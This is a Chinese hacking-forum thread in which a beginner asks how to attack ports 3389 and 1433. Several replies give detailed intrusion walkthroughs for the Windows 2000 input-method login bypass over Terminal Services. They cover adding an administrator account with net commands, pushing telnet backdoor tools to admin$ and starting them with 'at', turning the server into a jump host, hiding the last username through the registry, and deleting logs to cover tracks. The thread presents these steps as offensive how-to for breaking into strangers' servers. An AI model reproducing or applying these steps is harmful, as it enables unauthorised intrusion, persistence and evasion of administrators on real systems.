论坛: 菜鸟乐园 标题: 有谁知道3389和1433端口怎么攻击啊!谢谢了!我要详细的方法, 复制本贴地址    
作者: godhacker [godhacker]    论坛用户   登录
谢谢了 

地主 发表时间: 04/06 04:40

回复: pflj [pflj]      登录
下一步打开终端服务客户端程序。填入你扫描到的IP地址,单击连接连接成功后会跳转到下面的窗口,呵呵,需要用户名和密码才能登陆,咱们马上来创建一个,按键盘的Ctrl+Shift切换到中文输入法,在输入法工具条上点鼠标右键,然后选择输入法入门,然后进入输入法帮助,在空白处点鼠标右键,选择跳至连接,填入c:\winnt\system32 就是到这个转目录去
在目录里随便找到一个可执行的文件,点击鼠标右键,选择创建快捷方式
找到刚才创建的快捷方式,点鼠标右键选择属性,将目标改为:
c:\winnt\system32\net.exe user hacker 1234 /add  
这个DOS命令熟悉吗,意思是创建一个名为hacker密码为1234的新用户,然后点确定,双击刚才改好的快捷方式,执行它,执行以后可能看不到什么结果,其实已经运行完毕了
这台服务器从此就有了你的用户名,呵呵,别急,这时再对快捷方式点右键,选择属性,将目标改为 :
c:\winnt\system32\net.exe localgroup administrators hacker /add
然后点确定,在双击运行它。意思是将你刚才创建的那个hacker的用户名加到administrators组中,administrators组是服务器管理员组,这样还有什么做不了呢,最后你回到登陆页面,用刚才创建的用户名和密码登陆,这台可怜的从此服务器就要多一个主人,强烈建议你不要破坏她,也不要更改里面的任何设置,因为我觉得现在这种漏洞还是很多,有了这台肉机你可以用他做很多事,比如:下载文件,上传文件,扫描,等等。如果有心的话你可以帮这台服务器把此漏洞清除掉,具体方法是在搜索中查找输入法的帮助文件,可以利用的有:PINTLGNT.CHM(微软拼音输入法),WINSP.CHM(双拼输入法帮助文件),WINZM.CHM(郑码输入法帮助文件),WINPY.CHM(全拼输入法帮助文件)WINIME.CHM(输入法操作指南)将以上文件全部删除,要想长期使用这台肉机,你可以修改注册表HKEY_LOCAL_MACHINE---SOFTWARE---Microsoft---Winnt---CurrentVersion---Winlogon ,找到DontDisplayLastUserName,将键值设置为1 ,这样管理员就不太容易发现你了。

[此贴被 浦饭(pflj) 在 4月6日14时49分 编辑过]

B1层 发表时间: 4/6 14:41

回复: zhuyun_321 [zhuyun_321]   论坛用户   登录
我想问一下,你首先用的是什么工具啊(进行扫描的)
在98里面是不是不可以用那条命令啊(net)

B2层 发表时间: 04/07 11:43

回复: pflj [pflj]      登录
用本站的SuperScan搜索3389端口就可以了!

B3层 发表时间: 04/07 12:47

回复: godhacker [godhacker]   论坛用户   登录
你说发的文章我以前就知道了,但我不是很明白!我希望你能说的细细的,谢谢了,呵呵 

B4层 发表时间: 04/07 13:31

回复: lmq [lmq]   论坛用户   登录
跳转的时候还可以跳这个: http://***/**.exe

B5层 发表时间: 04/09 02:00

回复: fubin [fubin]   论坛用户   登录
那你说的上一步是什么?




一个大菜鸟


B6层 发表时间: 04/09 17:06

回复: chriski [chriski]   论坛用户   登录
可是我用这种方法的时候,要用鼠标右键去点击输入法工具条的时候,却不能打开右键菜单阿,这是为什么阿!!

B7层 发表时间: 04/09 18:33

回复: ddyyui [ddyyui]   论坛用户   登录
你说的前面打开客户端怎么做啊

B8层 发表时间: 04/09 19:21

回复: zhuyun_321 [zhuyun_321]   论坛用户   登录
我好象不好改变属性的,而我见过可以改属性的只有一个C:\COMMAND.COM是可以改的

B9层 发表时间: 04/10 11:12

回复: bluenet [bluenet]   论坛用户   登录

    WIN2000中文简体版存在的输入法漏洞,可以使本地用户绕过身分验证机制进入系统内部。经实验,WIN2000中文简体版的终端服务,在远程操作时仍然存在这一漏洞,而且危害更大。 
WIN2000的终端服务功能,能使系统管理员对WIN2000进行远程操作,采用的是图形界面,能使用户在远程控制计算机时功能与在本地使用一样,其默认端口为3389,用户只要装了WIN2000的客户端连接管理器就能与开启了该服务的计算机相联。因此这一漏洞使终端服务成为WIN2000的合法木马。 
工具:客户端连接管理器,下载地址:http://minisql.51.net/rj/WIN.zip,端口扫描器一个,推荐使用:流光、网络刺客2、superscan。 
入侵步骤: 
一,获得管理员账号。 
我们先对一个网段进行扫描,扫描端口设为3389,运行客户端连接管理器,将扫描到的任一地址加入到,设置好客户端连接管理器,然后与服务器连结。几秒钟后,屏幕上显示出WIN2000登录界面(如果发现是英文或繁体中文版,放弃,另换一个地址),用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条(如果没有出现,请耐心等待,因为对方的数据流传输还有一个过程)。用右键点击状态条上的微软徽标,弹出“帮助”(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞),打开“帮助”一栏中“操作指南”,在最上面的任务栏点击右键,会弹出一个菜单,打开“跳至URL”。此时将出现WIN2000的系统安装路径和要求我们填入的路径的空白栏。比如,该系统安装在C盘上,就在空白栏中填入"c:\winnt\system32"。然后按“确定”,于是我们就成功地绕过了身份验证,进入了系统的SYSTEM32目录。 
现在我们要获得一个账号,成为系统的合法用户。在该目录下找到"net.exe",为"net.exe"创建一个快捷方式,右键点击该快捷方式,在“属性”->“目标”->c:\winnt\system32\net.exe后面空一格,填入"user guest /active :yes"点“确定”。这一步骤目的在于用net.exe激活被禁止使用的guest账户,当然也可以利用"user 用户名 密码/add",创建一个新账号,但容易引起网管怀疑。运行该快捷方式,此时你不会看到运行状态,但guest用户已被激活。然后又修改该快捷方式,填入"user guest 密码",运行,于是guest便有了密码。最后,再次修改,填入“localgroup administrators guest /add,将guest变成系统管理员。 
注意事项:1、在这过程中,如果对方管理员正在使用终端服务管理器,他将看到你所打开的进程id,你的ip和机器名,甚至能够给你发送消息。 
2、终端服务器在验证你的身份的时候只留给了你一分钟的时间,在这一分钟内如果你不能完成上述操作,你只能再连结。 
3、你所看到的图像与操作会有所延迟,这受网速的影响。 

二,创建跳板。 
再次登录终端用务器,以"guest"身份进入,此时guest已是系统管理员,已具备一切可执行权。打开“控制面板”,进入“网络和拔号连接”,在“本地连接”或“拔号连接”中查看属性,看对方是否选择“Microsoft 网络的文件和打印机共享”,如果没有,就打上勾。对方如果使用的是拔号上网,下次拔号网络共享才会打开。 
退出对方系统,在本地机命令提示符下,输入 
net use \\IP Address\IPC$ ["password"] /user:"guset",通过IPC的远程登陆就成功了。 
登陆成功之后先复制一个Telnet的程序上去(小榕流光安装目录下的Tools目录里的Srv.exe,另外,还有ntml.xex,一会要用),这个程序是在对方上面开一个Telnet服务,端口是99。 
copy c:\hack\srv.exe \\***.***.***.***\admin$ 
然后利用定时服务启动它,先了解对方的时间: 
net time \\***.***.***.*** 
显示: 
\\***.***.***.*** 的当前时间是 2001/1/8 下午 08:55 
命令成功完成。 
然后启动srv.exe: 
at \\***.***.***.*** 09:00 srv.exe  
显示: 
新加了一项作业,其作业 ID = 0 
过几分钟后,telnet ***.***.***.*** 99 
这里不需要验证身份,直接登录,显示: 
c:\winnt:\system32> 
我们就成功登陆上去了。然后又在本地打开命令提示符,另开一个窗口,输入: 
copy c:\hack\ntlm.exe \\211.21.193.202\admin$ 
把事先存放在hack目录里的ntlm.exe拷过去。然后又回到刚才的telnet窗口,运行ntlm.exe 
C:\WINNT\system32>ntlm 
显示: 
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved. 
Done! 
C:\WINNT\system32> 
C:\WINNT\system32> 
好,现在我们来启动WIN2000本身的telnet,首先终止srv.exe的telnet服务: 
net stop telnet 系统告诉你并没有启动telnet,不理它,继续: 
net start telnet 这次真的启动了telnet,我们可以在另开的命令提示符窗口telnet到对方的 
23端口,验证身份,输入我们的guest账号和密码,它就真正成为我们的跳板了。我们可以利用它到其它的主机去。 
三、扫除脚印: 
删除为net.exe 创建的快捷方式,删除winnt\system32\logfiles下边的日志文件 

补漏方法: 
1、打补丁 
2、删除输入法帮助文件 
3、停止终端服务。   



B10层 发表时间: 04/10 14:54

回复: ma2751_cn [ma2751_cn]      登录
现在有这中漏洞的电脑好少哦。

B11层 发表时间: 04/10 17:33

回复: stone [stone]   论坛用户   登录
是啊!补丁都出来好长时间了!谁还不打啊?呵呵...不过真的也有!

B12层 发表时间: 04/10 22:17

回复: lanbug [lanbug]   论坛用户   登录
的确很菜~~~~

B13层 发表时间: 04/11 10:05

回复: junjianiao [junjianiao]   论坛用户   登录
   我下载的superscan其中的两个可执行文件的用户界面是一样的,没有连接的界面,是怎么一回事呀?


B14层 发表时间: 04/11 12:09

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号